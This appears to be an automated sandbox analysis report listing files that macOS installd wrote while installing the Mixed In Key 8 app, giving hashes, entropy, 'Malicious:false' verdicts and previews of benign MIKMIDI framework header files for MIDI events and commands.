                                                                                                    SHA-256:3E433CC0E995A4F28F9C6835963B8AAA59BEA8CAFCE9D53783B4F47BCCF6F198
                                                                                                    SHA-512:226F7EEEB62E61CF720CF620C9649B4909790084050C2C09B21BE8C43144154A727BEC25C1935F26F3BC6DC2966390A91B2630D2D552F35B7034F9203E9375EC
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDIProgramChangeEvent.h.// MIKMIDI.//.// Created by Andrew Madsen on 3/4/15..// Copyright (c) 2015 Mixed In Key. All rights reserved..//..#import "MIKMIDIChannelEvent.h".#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN../**. * A MIDI program change event.. *. * Program change events indicate a change in the patch number.. * These events can be sent to to a MIDI device or synthesizer to. *.change the instrument the instrument/voice being used to synthesize MIDI.. *. * This event is the counterpart to MIKMIDIProgramChangeCommand in the context. * of sequences/MIDI Files.. */.@interface MIKMIDIProgramChangeEvent : MIKMIDIChannelEvent../**. * The program (aka patch) number. From 0-127.. *. * Assuming the device or synthesizer playing this event. * supports the General MIDI sound set, you can find. * a list of instruments by their program number here:. * http://www.midi.org/techspecs/gm1sound.php. */.@property (nonatomic, readonly) NSUInteger program
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_gPXdrl
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Lisp/Scheme program text
                                                                                                    Size (bytes):3690
                                                                                                    Entropy (8bit):5.108001426228527
                                                                                                    Encrypted:false
                                                                                                    MD5:5FDCB879519F603F2D3F313D95D3BC0B
                                                                                                    SHA1:B7D97A8EE6B4668B7D50D06AC63BB6E6B882B189
                                                                                                    SHA-256:0194552261A28A04AAA1B12E998A5B235599F6C1D97ACA0A23A7B945DE070F5D
                                                                                                    SHA-512:D8A42D748624B17AF14E20FBE2A45018EBAF31B2446831B93CB8FBE98388BE37F93ADFABAD122226FB815D9589EA733DCBBB71EE30C74BFEFA6A2F120031FA4D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDIMetaKeySignatureEvent.h.// MIDI Files Testbed.//.// Created by Jake Gundersen on 5/23/14..// Copyright (c) 2014 Mixed In Key. All rights reserved..//..#import "MIKMIDIMetaEvent.h".#import "MIKMIDICompilerCompatibility.h"..typedef NS_ENUM(int8_t, MIKMIDIMusicalKey) {..MIKMIDIMusicalKeyCFlatMajor = -7,..MIKMIDIMusicalKeyGFlatMajor,..MIKMIDIMusicalKeyDFlatMajor,..MIKMIDIMusicalKeyAFlatMajor,..MIKMIDIMusicalKeyEFlatMajor,..MIKMIDIMusicalKeyBFlatMajor,..MIKMIDIMusicalKeyFMajor,..MIKMIDIMusicalKeyCMajor,..MIKMIDIMusicalKeyGMajor,..MIKMIDIMusicalKeyDMajor,..MIKMIDIMusicalKeyAMajor,..MIKMIDIMusicalKeyEMajor,..MIKMIDIMusicalKeyBMajor,..MIKMIDIMusicalKeyFSharpMajor,..MIKMIDIMusicalKeyCSharpMajor,....MIKMIDIMusicalKeyAFlatMinor = MIKMIDIMusicalKeyCFlatMajor+100,..MIKMIDIMusicalKeyEFlatMinor,..MIKMIDIMusicalKeyBFlatMinor,..MIKMIDIMusicalKeyFMinor,..MIKMIDIMusicalKeyCMinor,..MIKMIDIMusicalKeyGMinor,..MIKMIDIMusicalKeyDMinor,..MIKMIDIMusicalKeyAMinor,..MIKMIDIMusicalKeyEMinor,..MIKM
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_hIXQZ5
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:UTF-8 Unicode C++ program text
                                                                                                    Size (bytes):592
                                                                                                    Entropy (8bit):5.119179529415619
                                                                                                    Encrypted:false
                                                                                                    MD5:AE1D683DF3D4C0B163A230203727035A
                                                                                                    SHA1:B73A92CD45BD0390ED48453754B4A420DE637BE4
                                                                                                    SHA-256:00D9CA1D434AFE28967AC80745A26D4A525F4C991BCD8E8A528047DDF08F39DC
                                                                                                    SHA-512:E482577ED858184A5A755F5370C7E3D627C242E43ABE2E9F6F6A80F534E383B6AE914EFC97D671D89DAA3543F2648A85F44A9FB30C83DDE585AB6DCA7645A137
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDITransmittable.h.// MIKMIDI.//.// Created by Andrew Madsen on 2/7/18..// Copyright .. 2018 Mixed In Key. All rights reserved..//..#import <Foundation/Foundation.h>..NS_ASSUME_NONNULL_BEGIN..@protocol MIKMIDITransmittable <NSObject>..@optional./*. Some MIDI commands, e.g. 14-bit MIKMIDIControlChangeCommands, need to be split into multiple MIDI messages or otherwise transformed before sending through an output port. This method should return an array of command(s) to be sent to represent the receiver.. */.- (NSArray *)commandsForTransmission;..@end..NS_ASSUME_NONNULL_END.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_hsRttS
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):765
                                                                                                    Entropy (8bit):5.138027559072134
                                                                                                    Encrypted:false
                                                                                                    MD5:3084D2EE5B41103394046F6AD0036237
                                                                                                    SHA1:6CBC3C26194110930D10726B72702488075ABBD9
                                                                                                    SHA-256:4781FDD494E46449609238F31D976AAF8EA6ED36A1579FCEC7AB245BFB8DCFD6
                                                                                                    SHA-512:0D5F4479DAA4ADCC36C34AA451C558799677F84FC6CE2E6E0843CA5424FFB1103CD329C3BD43B8B0D44D77A31CA39B4A95552CAD71B22E7AB5A7807B71BC92E6
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDIOutputPort.h.// MIDI Testbed.//.// Created by Andrew Madsen on 3/8/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import "MIKMIDIPort.h".#import "MIKMIDICompilerCompatibility.h"..@class MIKMIDICommand;.@class MIKMIDIDestinationEndpoint;..NS_ASSUME_NONNULL_BEGIN../**. * MIKMIDIOutputPort is an Objective-C wrapper for CoreMIDI's MIDIPort class, and is only for destination ports.. * It is not intended for use by clients/users of of MIKMIDI. Rather, it should be thought of as an. * MIKMIDI private class.. */.@interface MIKMIDIOutputPort : MIKMIDIPort..- (BOOL)sendCommands:(MIKArrayOf(MIKMIDICommand *) *)commands toDestination:(MIKMIDIDestinationEndpoint *)destination error:(NSError **)error;..@end..NS_ASSUME_NONNULL_END.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_j2LzS0
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):1261
                                                                                                    Entropy (8bit):5.145011106872849
                                                                                                    Encrypted:false
                                                                                                    MD5:DD459817E8302C3128B5968982B29838
                                                                                                    SHA1:BA3ED980009C7088A68A8D1B2A0282DBF37DEB94
                                                                                                    SHA-256:9DB199883CD47755B41DEBF9DBC62705E36AE7A4F2775E2525354953B4FFBA48
                                                                                                    SHA-512:5EBC14B5D6DFE0AAEECE09603BC9AF1D8449062D7D9DDE017086EFB44A209BBFA11900613912B0D4FE2492A922046102010E0D6D05EEDC184D88050237927188
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDIPitchBendChangeCommand.h.// MIKMIDI.//.// Created by Andrew Madsen on 3/5/15..// Copyright (c) 2015 Mixed In Key. All rights reserved..//..#import "MIKMIDIChannelVoiceCommand.h".#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN../**. * A MIDI pitch bend change command.. *. * On devices, pitch bends messages are usually generated using a wheel or lever.. */.@interface MIKMIDIPitchBendChangeCommand : MIKMIDIChannelVoiceCommand../**. * A 14-bit value indicating the pitch bend.. * Center is 0x2000 (8192).. * Valid range is from 0-16383.. */.@property (nonatomic, readonly) UInt16 pitchChange;..@end..@interface MIKMutableMIDIPitchBendChangeCommand : MIKMIDIPitchBendChangeCommand..@property (nonatomic, readwrite) UInt16 pitchChange;..@property (nonatomic, readwrite) UInt8 channel;.@property (nonatomic, readwrite) NSUInteger value;..@property (nonatomic, strong, readwrite) NSDate *timestamp;.@property (nonatomic, readwrite) MIKMIDICommandType commandType;.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_j8tSYe
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):3584
                                                                                                    Entropy (8bit):4.842994059840263
                                                                                                    Encrypted:false
                                                                                                    MD5:8A92AD39CEF7E9D2AED5459A29C986B2
                                                                                                    SHA1:AC26AEB3C38A0E850F7E73BDBE9B9DCC2F6A27F6
                                                                                                    SHA-256:CF45B1E56A9C0BE89B660E39EF53892A6FA237977EF27FCB58C77E42381B13C1
                                                                                                    SHA-512:203E4D71052650B4CD72FFDBDCC5DE8C54BE2CC8EFEDDBFFA7B8F814C5820B36F2DEB7BAD2F9CB9D15FCCEC2FD22B9CC37107AB7A6DD2B37C877E76DCEAAC352
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDITimeSignatureEvent.h.// MIDI Files Testbed.//.// Created by Jake Gundersen on 5/22/14..// Copyright (c) 2014 Mixed In Key. All rights reserved..//..#import "MIKMIDIMetaEvent.h".#import "MIKMIDICompilerCompatibility.h"../**. * Represents a time signature. Note that in contrast to time signature events in raw MIDI,. * the denominator here is the "natural" denominator for the time signature. e.g. 4/4 time. * is represented with a numerator of 4 and denominator of 4.. */.typedef struct {..UInt8 numerator; /// The number of beats per measure...UInt8 denominator; // The fraction of a whole note per beat (e.g. 4 here means a quarter note per beat).} MIKMIDITimeSignature;../**. * Convenience function to create a MIDITimeSignature struct.. *. * For example, to create a time signature struct for 4/4 time:. * MIKMIDITimeSignatureMake(4, 4). *. * @param numerator The numerator for the time signature, or number of beats per measure.. * @param denominator The denominator f
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_kQw05w
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):784
                                                                                                    Entropy (8bit):5.047424079472958
                                                                                                    Encrypted:false
                                                                                                    MD5:D7EAF00E9FD00773D3F855B2C596B905
                                                                                                    SHA1:998188822CC670CC8DCD214C77DCF15ED1783B49
                                                                                                    SHA-256:2DBED457DD6D95F5021D2F300DD884CAA424903964AA8CF3C4175C94C6F8A53E
                                                                                                    SHA-512:78958B85AD0DF6FEEF3853AF5454862F13FD1947A6F664F15842BD5B0EF1E6A5AE6E9BEC6EE03B96E0C11ED5A7C31782FADD8F95C229A0FF01C41F3020200DA3
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDIMetaInstrumentNameEvent.h.// MIDI Files Testbed.//.// Created by Jake Gundersen on 5/22/14..// Copyright (c) 2014 Mixed In Key. All rights reserved..//..#import "MIKMIDIMetaTextEvent.h".#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN../**. * A meta event containing an instrument name.. */.@interface MIKMIDIMetaInstrumentNameEvent : MIKMIDIMetaTextEvent..@end.../**. * The mutable counterpart of MIKMIDIMetaInstrumentNameEvent.. */.@interface MIKMutableMIDIMetaInstrumentNameEvent : MIKMIDIMetaInstrumentNameEvent..@property (nonatomic, readwrite) MusicTimeStamp timeStamp;.@property (nonatomic, readwrite) MIKMIDIMetaEventType metadataType;.@property (nonatomic, strong, readwrite, null_resettable) NSData *metaData;..@end..NS_ASSUME_NONNULL_END
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_keibOi
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):1226
                                                                                                    Entropy (8bit):5.0237189853868465
                                                                                                    Encrypted:false
                                                                                                    MD5:615F075DBA9AFCA1A89B88E9391077F4
                                                                                                    SHA1:8DCDB3406E21DE496130DEAAE30ED4246985F3C9
                                                                                                    SHA-256:A84629CF3AF50211A2598BB1E7738067E2CA47B10325499904F930F00D93A182
                                                                                                    SHA-512:AC37F84627CEC8CA6FA426CD70DCABDCD5CA51E3CA26D42B30C4A0EF8A4CFEBB5EE24AC261968F2B75B1F42B7FC6FD46F20CD7B8A8F83C63F1691B7AA507BEAA
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDICommandThrottler.h.// MIKMIDI.//.// Created by Andrew Madsen on 11/11/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import <Foundation/Foundation.h>.#import "MIKMIDICompilerCompatibility.h"..@class MIKMIDIChannelVoiceCommand;..NS_ASSUME_NONNULL_BEGIN../**. * MIKMIDICommandThrottler is a simple utility class useful for throttling e.g. jog wheel/turntable controls, . * which otherwise send many messages per revolution.. */.@interface MIKMIDICommandThrottler : NSObject../**. * Determine whether a command from a throttled control should be handled or discarded.. *. * @param command The command received from the throttled control.. * @param factor The throttling factor to apply. e.g. a value of 20 means that only 1 of every 20 messages should be handled.. *. * @return YES if the command should be handled, NO if it should be discarded.. */.- (BOOL)shouldPassCommand:(MIKMIDIChannelVoiceCommand *)command forThrottlingFactor:(NSUInteger)factor;../**.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_n8xvax
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):763
                                                                                                    Entropy (8bit):5.089398720125661
                                                                                                    Encrypted:false
                                                                                                    MD5:F2CEE092A8CC9AC62C2EBCEDC3C8B435
                                                                                                    SHA1:B2E8FDC79BABA626B2C19B1C3576C12065D36BB2
                                                                                                    SHA-256:0FC8507D0C42C2DCB2A257A13601AFF1E5E928889575998AD3D8247E2497217F
                                                                                                    SHA-512:1B0C40F81339B752BD9EE85AF37DF78268B78AC0E04FB393F54D1B7115BC0840369BC8AF90A8470ED95A6889AD1E85AAB25E67259A6867039CDCCABC40E89DAA
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDIMetaMarkerTextEvent.h.// MIDI Files Testbed.//.// Created by Jake Gundersen on 5/22/14..// Copyright (c) 2014 Mixed In Key. All rights reserved..//..#import "MIKMIDIMetaTextEvent.h".#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN../**. * A meta event containing marker information.. */.@interface MIKMIDIMetaMarkerTextEvent : MIKMIDIMetaTextEvent..@end../**. * The mutable counterpart of MIKMIDIMetaMarkerTextEvent.. */.@interface MIKMutableMIDIMetaMarkerTextEvent : MIKMIDIMetaMarkerTextEvent..@property (nonatomic, readwrite) MusicTimeStamp timeStamp;.@property (nonatomic, readwrite) MIKMIDIMetaEventType metadataType;.@property (nonatomic, strong, readwrite, null_resettable) NSData *metaData;..@end..NS_ASSUME_NONNULL_END
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_nYbDRM
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):2000
                                                                                                    Entropy (8bit):4.87080851854066
                                                                                                    Encrypted:false
                                                                                                    MD5:0D40516412961E458ADF6919E6B78840
                                                                                                    SHA1:A616A3C92C82BD5E08305DE4BD1502786CA05DAD
                                                                                                    SHA-256:F3811A92EC5686B8C6F42138304ED59C4C9CF25C2601873D5BECBEB3BC684DBA
                                                                                                    SHA-512:3695AAB1CD6DFAD30322E4D2F243D0A6C8556E85947A46AC7B5BC58034A595DD97380AE7857D5F43D5753AEA5EBD07282805919019A988B0C5AA62945633B6F4
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDIClientDestinationEndpoint.h.// Pods.//.// Created by Andrew Madsen on 9/26/14..//.//..#import "MIKMIDIDestinationEndpoint.h".#import "MIKMIDICompilerCompatibility.h"..@class MIKMIDIClientDestinationEndpoint;.@class MIKMIDICommand;..NS_ASSUME_NONNULL_BEGIN..typedef void(^MIKMIDIClientDestinationEndpointEventHandler)(MIKMIDIClientDestinationEndpoint *destination, MIKArrayOf(MIKMIDICommand *) *commands);../**. *.MIKMIDIClientDestinationEndpoint represents a virtual endpoint created by your application to receive MIDI. *.from other applications on the system.. *. * Instances of this class will be visible and can be connected to by other applications.. */.@interface MIKMIDIClientDestinationEndpoint : MIKMIDIDestinationEndpoint../**. * Initializes a new virtual destination endpoint.. *. * This is essentially equivalent to creating a Core MIDI destination endpoint. * using MIDIDestinationCreate(). Destination endpoints created using this. * method can be used by your appl
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_oBpBPe
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):2508
                                                                                                    Entropy (8bit):5.042222590968136
                                                                                                    Encrypted:false
                                                                                                    MD5:768A7EF8186ACAF4E38CA6BA2D0CBBE5
                                                                                                    SHA1:0A9C48034C7CC8F45B57244841671169F5DC13FE
                                                                                                    SHA-256:F6C37C202083C0D27CB477E6688DA4901DD370ADC6393A838AA58F8CD82918FE
                                                                                                    SHA-512:AE945F61815FB2B1FDCD8C62144F6D08BF184C044EBF033715FF780D0B4E29AD0F04F16F3D8C0BCF9BC832DA5DD3C38A9D689CDB5533522546EFDD2B660249E8
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDINoteOnCommand.h.// MIDI Testbed.//.// Created by Andrew Madsen on 6/2/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import "MIKMIDINoteCommand.h"..NS_ASSUME_NONNULL_BEGIN../**. * A MIDI note on message.. */.@interface MIKMIDINoteOnCommand : MIKMIDINoteCommand../**. * Convenience method for creating a note on command.. *. * @param note The note number for the command. Must be between 0 and 127.. * @param velocity The velocity for the command. Must be between 0 and 127.. * @param channel The channel for the command. Must be between 0 and 15.. * @param timestamp The timestamp for the command. Pass nil to use the current date/time.. *. * @return An initialized MIKMIDINoteOnCommand instance.. */.+ (instancetype)noteOnCommandWithNote:(NSUInteger)note........ velocity:(NSUInteger)velocity........ channel:(UInt8)channel........timestamp:(nullable NSDate *)timestamp;.../**. * Convenience method for creating a note on command.. *. * @param n
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_oexA3D
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):1163
                                                                                                    Entropy (8bit):5.0795987755393615
                                                                                                    Encrypted:false
                                                                                                    MD5:0CAEDCD6B05EB67809ECA3053164F534
                                                                                                    SHA1:7275A925F93AC76A5E5D34640A44B5BF9D295D55
                                                                                                    SHA-256:BC6FA79C92180B4AA700C78D7B83020762445AB2EF49B4754900333CCAC223D8
                                                                                                    SHA-512:E63BFAE56C8638D34A1FDF9D034830F7CFF553B4B9E20CC23C4354F5780037B0CCF46132663ACF50D12D1E15381556EC7493006B061EE71419D765E3AEE83D2B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDIChannelPressureEvent.h.// MIKMIDI.//.// Created by Andrew Madsen on 3/4/15..// Copyright (c) 2015 Mixed In Key. All rights reserved..//..#import "MIKMIDIChannelEvent.h".#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN../**. * A channel pressure (aftertouch) event.. *. * This event is different from MIKMIDIPolyphonicKeyPressureEvent.. * This event is used to indicate the single greatest pressure value. * (of all the current depressed keys).. */.@interface MIKMIDIChannelPressureEvent : MIKMIDIChannelEvent../**. * The pressure of the event. From 0-127.. */.@property (nonatomic, readonly) UInt8 pressure;..@end../**. * The mutable counter part of MIKMIDIChannelPressureEvent. */.@interface MIKMutableMIDIChannelPressureEvent : MIKMIDIChannelPressureEvent..@property (nonatomic, readwrite) UInt8 pressure;..@property (nonatomic, readwrite) MusicTimeStamp timeStamp;.@property (nonatomic, strong, readwrite, null_resettable) NSMutableData *data;.@property (no
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_pUG4F8
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):4096
                                                                                                    Entropy (8bit):4.91602138918715
                                                                                                    Encrypted:false
                                                                                                    MD5:423063FD68A31E7362C15118A8ADA353
                                                                                                    SHA1:EA1778AF3C89295FED40C0805D8AA739A7459D3E
                                                                                                    SHA-256:68821A1EA1B53918F244DEAA8BC9155BF907B96102065D5009FE786A5C170B5A
                                                                                                    SHA-512:85FDD70E99751D1E6A4187B70E09EBD67CEC6CC40AF452FED9BE48219BDB48219208CD2F0DA15FB38600D7D8E0C49D806D7EE87CF81B107A62479FC9C7D1B7B1
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDICommand_SubclassMethods.h.// MIDI Testbed.//.// Created by Andrew Madsen on 6/2/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import "MIKMIDICommand.h".#import "MIKMIDITransmittable.h"../**. * These methods can be called and/or overridden by subclasses of MIKMIDICommand, but are not. * otherwise part of the public interface to MIKMIDICommand. They should not be called directly. * except by subclasses of MIKMIDICommand.. */.@interface MIKMIDICommand () <MIKMIDITransmittable>../**. * Registers a subclass of MIKMIDICommand. Registered subclasses will be instantiated and returned. * by +[MIKMIDICommand commandWithMIDIPacket:] and +[MIKMIDICommand commandForCommandType:] for. * commands they support.. *. * Typically this method should be called in the subclass's +load method.. *. * @note If two subclasses support the same command type, as determined by calling +supportedMIDICommandTypes. * which one is used is undefined.. *. * @param subclass A
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_pc4y9k
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):967
                                                                                                    Entropy (8bit):5.10730422383203
                                                                                                    Encrypted:false
                                                                                                    MD5:901C7C8120F89F1A20DE36C4E970F9FA
                                                                                                    SHA1:E90DA8AE9FF606A7EA5BE723A0AFE9CAAABBFDE3
                                                                                                    SHA-256:93C571DA4AC321EF0CDD6B1EE2F5049B01D6BEBB368671AD94D32E491A287DC4
                                                                                                    SHA-512:85ABA1B8299578E2F8FF7D9E1AFBFBE0CF8219AF312113EB948BDA0671CFCDB7DFD314A95D8A4628A8583BCD172590F888315B058541E3F510ADF814BCA1AB6F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDIMetadataTextEvent.h.// MIDI Files Testbed.//.// Created by Jake Gundersen on 5/22/14..// Copyright (c) 2014 Mixed In Key. All rights reserved..//..#import "MIKMIDIMetaEvent.h".#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN../**. * A meta event containing text.. */.@interface MIKMIDIMetaTextEvent : MIKMIDIMetaEvent..- (instancetype)initWithString:(NSString *)string timeStamp:(MusicTimeStamp)timeStamp;../**. * The text for the event.. */.@property (nonatomic, readonly, nullable) NSString *string;..@end../**. * The mutable counterpart of MIKMIDIMetaTextEvent.. */.@interface MIKMutableMIDIMetaTextEvent : MIKMIDIMetaTextEvent..@property (nonatomic, readwrite) MusicTimeStamp timeStamp;.@property (nonatomic, readwrite) MIKMIDIMetaEventType metadataType;.@property (nonatomic, strong, readwrite, null_resettable) NSData *metaData;.@property (nonatomic, copy, readwrite, nullable) NSString *string;..@end..NS_ASSUME_NONNULL_END
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_ppqxHw
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):17508
                                                                                                    Entropy (8bit):4.853870026899522
                                                                                                    Encrypted:false
                                                                                                    MD5:20DD501A931709733773DFFD6B31FA0D
                                                                                                    SHA1:6FFF8C8A20A9118C4956B94A2F489F5726DEC929
                                                                                                    SHA-256:8F79C4C0E5A545780CF06B761D8B2D9D5C4232176677BF3DBCEE6DFF56759590
                                                                                                    SHA-512:9F22DC276668192CC490971DDE0844D988B6D417F946C0761EF15CFB7B6ABF8496380B0880FF94129024B840DCED5146185DBD0C16AAB7FAB5B82BBBDCCEFB9B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDISequence.h.// MIDI Files Testbed.//.// Created by Andrew Madsen on 5/21/14..// Copyright (c) 2014 Mixed In Key. All rights reserved..//..#import <Foundation/Foundation.h>.#import <AudioToolbox/AudioToolbox.h>.#import "MIKMIDICompilerCompatibility.h".#import "MIKMIDIMetaTimeSignatureEvent.h"..@class MIKMIDITrack;.@class MIKMIDISequencer;.@class MIKMIDIDestinationEndpoint;.@class MIKMIDIMetaTimeSignatureEvent;.@class MIKMIDITempoEvent;..NS_ASSUME_NONNULL_BEGIN../**. * Instances of MIKMIDISequence contain a collection of MIDI tracks. MIKMIDISequences may be thought. * of as MIDI "songs". They can be loaded from and saved to MIDI files. They can also be played. * using an MIKMIDISequencer.. *. * @see MIKMIDITrack. * @see MIKMIDISequencer. */.@interface MIKMIDISequence : NSObject../**. * Creates and initializes a new instance of MIKMIDISequence.. *. * @return A new instance of MIKMIDISequence, or nil if an error occured.. */.+ (nullable instancetype)sequence;../**. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_rBbKVV
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):997
                                                                                                    Entropy (8bit):5.279979213885782
                                                                                                    Encrypted:false
                                                                                                    MD5:3F6954DC2941E0EAFB1444186C7D3E9A
                                                                                                    SHA1:A6F1E8FEB35DA8E986A3D41724128321227AF0F8
                                                                                                    SHA-256:D62F64A355070C199D0D45E59CCC3D3318F1F5516B404BFE339D0953F161E180
